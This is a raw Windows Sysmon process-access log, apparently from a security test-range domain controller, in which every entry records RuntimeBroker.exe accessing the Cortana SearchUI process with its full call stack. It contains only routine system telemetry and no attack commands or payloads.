13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406156C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406156C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
